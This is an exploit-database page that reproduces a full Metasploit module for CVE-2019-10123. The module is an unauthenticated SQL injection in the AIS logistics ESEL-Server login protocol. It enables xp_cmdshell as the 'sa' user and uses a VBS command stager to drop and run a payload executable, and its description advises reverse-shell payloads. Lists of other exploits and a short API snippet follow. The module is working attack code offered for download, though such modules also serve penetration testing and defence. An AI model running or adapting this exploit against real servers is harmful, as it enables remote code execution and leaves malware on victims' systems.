Menu

Search for hundreds of thousands of exploits

"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)"

Author

Metasploit

Platform

windows

Release date

2019-04-30

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MSSQL_COMMANDS
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'AIS logistics ESEL-Server Unauth SQL Injection RCE',
      'Description'    => %q{
        This module will execute an arbitrary payload on an "ESEL" server used by the
        AIS logistic software. The server typically listens on port 5099 without TLS.
        There could also be server listening on 5100 with TLS but the port 5099 is
        usually always open.
        The login process is vulnerable to an SQL Injection. Usually a MSSQL Server
        with the 'sa' user is in place.

        This module was verified on version 67 but it should also run on lower versions.
        An fixed version was created by AIS in September 2017. However most systems
        have not been updated.

        In regard to the payload, unless there is a closed port in the web server,
        you dont want to use any "bind" payload. You want a "reverse" payload,
        probably to your port 80 or to any other outbound port allowed on the firewall.

        Currently, one delivery method is supported

        This method takes advantage of the Command Stager subsystem. This allows using
        various techniques, such as using a TFTP server, to send the executable. By default
        the Command Stager uses 'wcsript.exe' to generate the executable on the target.

        NOTE: This module will leave a payload executable on the target system when the
        attack is finished.

      },
      'Author'         =>
        [
          'Manuel Feifel'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2019-10123'],
        ],
      'Platform'       => 'win',
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Payload'        =>
        {
          'BadChars'  => "\x00\xff\x27",
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'CmdStagerFlavor' => 'vbs',
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2019-03-27',
      'DefaultOptions' =>
        {
          'RPORT' => 5099
        },
      ))
  end

  # This is method required for the CmdStager to work...
  def execute_command(cmd, _opts)
    cmd_xp = "EXEC master..xp_cmdshell '#{cmd}'"
    send_login_msg(create_login_msg_sql(cmd_xp))
  end

  # prepends the required length to the message and sends it to the server
  def send_login_msg(login_msg, check_response = true)
    length = login_msg.length
    length += length.to_s.length
    login_msg = "#{length}#{login_msg}"

    connect

    sock.put(login_msg)
    response = sock.recv(10000)

    if check_response
      if (response.include? 'Zugangsdaten Falsch') && (response.length > (length - 20))
        print_good('Correct response received => Data send successfully')
      else
        print_warning('Wrong response received => Probably data could not be sent successfully')
      end
    end

    return response
  ensure
    # Every time a new Connection is required
    disconnect
  end

  # embeds a sql command into the login message
  def create_login_msg_sql(sql_cmd)
    return create_login_msg("#{rand(1_000..9_999)}'; #{sql_cmd}--")
  end

  # create a plain login message
  def create_login_msg(pw)
    delim = "\xFF"
    login_str = "#{delim}000000#{delim}20180810213226#{delim}01#{delim}60"\
                "#{delim}02#{delim}1111#{delim}#{pw}#{delim}AAAAA#{delim}120"

  end

  def check
    int = rand(1..1_000)
    response_bypass = send_login_msg(create_login_msg("#{rand(1_000..9_999)}' OR #{int}=#{int}--"), false)
    if response_bypass.include? 'Zugangsdaten OK'
      CheckCode::Vulnerable
    else
      print_status("Response was: #{response_bypass}")
      CheckCode::Safe
    end
  end

  def exploit
    # enable xp cmdshell, used to execute commands later
    # Software uses the 'sa' user by default
    send_login_msg(create_login_msg_sql(mssql_xpcmdshell_enable))
    # The porotocol has no limites on max-data
    execute_cmdstager({ :linemax => 1500 })
    print_warning('The payload is left on the client in the \%TEMP\% Folder of the corresponding user.')
    print_status('Stager should now be executed.')
  end
end
Release Date Title Type Platform Author
2019-09-16 "docPrint Pro 8.0 - SEH Buffer Overflow" local windows "Connor McGarr"
2019-09-16 "AppXSvc - Privilege Escalation" local windows "Gabor Seljan"
2019-09-06 "Windows NTFS - Privileged File Access Enumeration" local windows hyp3rlinx
2019-09-13 "Folder Lock 7.7.9 - Denial of Service" dos windows Achilles
2019-09-12 "Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts" dos windows "Google Security Research"
2019-09-12 "Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts" dos windows "Google Security Research"
2019-09-10 "Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)" local windows Metasploit
2019-09-10 "Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) (Metasploit)" local windows Metasploit
2019-09-02 "Kaseya VSA agent 9.5 - Privilege Escalation" local windows NF
2019-09-02 "ChaosPro 3.1 - SEH Buffer Overflow" local windows "Jonathan Crosby"
2019-09-02 "ChaosPro 2.1 - SEH Buffer Overflow" local windows "Jonathan Crosby"
2019-09-02 "ChaosPro 2.0 - SEH Buffer Overflow" local windows "Jonathan Crosby"
2019-08-30 "VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service" dos windows "James Chamberlain"
2019-08-30 "Asus Precision TouchPad 11.0.0.25 - Denial of Service" dos windows "Athanasios Tserpelis"
2019-08-30 "Easy MP3 Downloader 4.7.8.8 - 'Unlock Code' Denial of Service" dos windows "Mohan Ravichandran_ Snazzy Sanoj"
2019-08-30 "SQL Server Password Changer 1.90 - Denial of Service" dos windows "Velayutham Selvaraj_ Praveen Thiyagarayam"
2019-08-28 "Outlook Password Recovery 2.10 - Denial of Service" dos windows "Velayutham Selvaraj_ Praveen Thiyagarayam"
2019-08-26 "Windows 10 - SET_REPARSE_POINT_EX Mount Point Security Feature Bypass" local windows "Google Security Research"
2019-08-26 "LSoft ListServ < 16.5-2018a - Cross-Site Scripting" webapps windows MTK
2019-08-19 "RAR Password Recovery 1.80 - 'User Name and Registration Code' Denial of Service" dos windows Achilles
2019-08-15 "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities" local windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream" dos windows "Google Security Research"
Release Date Title Type Platform Author
2019-09-10 "October CMS - Upload Protection Bypass Code Execution (Metasploit)" remote php Metasploit
2019-09-10 "LibreNMS - Collectd Command Injection (Metasploit)" remote linux Metasploit
2019-09-10 "Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry (Metasploit)" local windows Metasploit
2019-09-10 "Windows 10 - UAC Protection Bypass Via Windows Store (WSReset.exe) (Metasploit)" local windows Metasploit
2019-09-05 "AwindInc SNMP Service - Command Injection (Metasploit)" remote linux Metasploit
2019-09-03 "Cisco RV110W/RV130(W)/RV215W Routers Management Interface - Remote Command Execution (Metasploit)" remote hardware Metasploit
2019-09-03 "Cisco Data Center Network Manager - Unauthenticated Remote Code Execution (Metasploit)" remote java Metasploit
2019-09-03 "Cisco UCS Director - default scpuser password (Metasploit)" remote unix Metasploit
2019-09-03 "ptrace - Sudo Token Privilege Escalation (Metasploit)" local linux Metasploit
2019-09-03 "ktsuss 1.4 - suid Privilege Escalation (Metasploit)" local linux Metasploit
2019-08-26 "Exim 4.87 / 4.91 - Local Privilege Escalation (Metasploit)" local linux Metasploit
2019-08-05 "Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)" remote windows Metasploit
2019-07-30 "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)" remote linux Metasploit
2019-07-29 "WP Database Backup < 5.2 - Remote Code Execution (Metasploit)" remote php Metasploit
2019-07-29 "Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)" remote unix Metasploit
2019-07-17 "Windows - NtUserSetWindowFNID Win32k User Callback Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-16 "PHP Laravel Framework 5.5.40 / 5.6.x < 5.6.30 - token Unserialize Remote Command Execution (Metasploit)" remote linux Metasploit
2019-07-16 "Microsoft Windows 10 < build 17763 - AppXSvc Hard Link Privilege Escalation (Metasploit)" local windows Metasploit
2019-07-12 "Xymon 4.3.25 - useradm Command Execution (Metasploit)" remote multiple Metasploit
2019-07-03 "Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)" remote windows Metasploit
2019-07-03 "Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)" local linux Metasploit
2019-07-02 "Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)" local macos Metasploit
2019-06-26 "Nagios XI 5.5.6 - Magpie_debug.php Root Remote Code Execution (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure Health Monitor - TarArchive Directory Traversal (Metasploit)" remote linux Metasploit
2019-06-20 "Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)" local linux Metasploit
2019-06-05 "LibreNMS - addhost Command Injection (Metasploit)" remote linux Metasploit
2019-06-05 "IBM Websphere Application Server - Network Deployment Untrusted Data Deserialization Remote Code Execution (Metasploit)" remote windows Metasploit
2019-05-29 "Oracle Application Testing Suite - WebLogic Server Administration Console War Deployment (Metasploit)" remote java Metasploit
2019-05-23 "Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit)" remote php Metasploit
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46782/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/46782/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46782/41206/ais-logistics-esel-server-unauth-sql-injection-rce-metasploit/download/", "exploit_id": "46782", "exploit_description": "\"AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit)\"", "exploit_date": "2019-04-30", "exploit_author": "Metasploit", "exploit_type": "remote", "exploit_platform": "windows", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Wig is a web application information gathering tool, which can identify numerous Content Management Systems and other administrative applications including basic vulnerability identification.

Browse exploit APIBrowse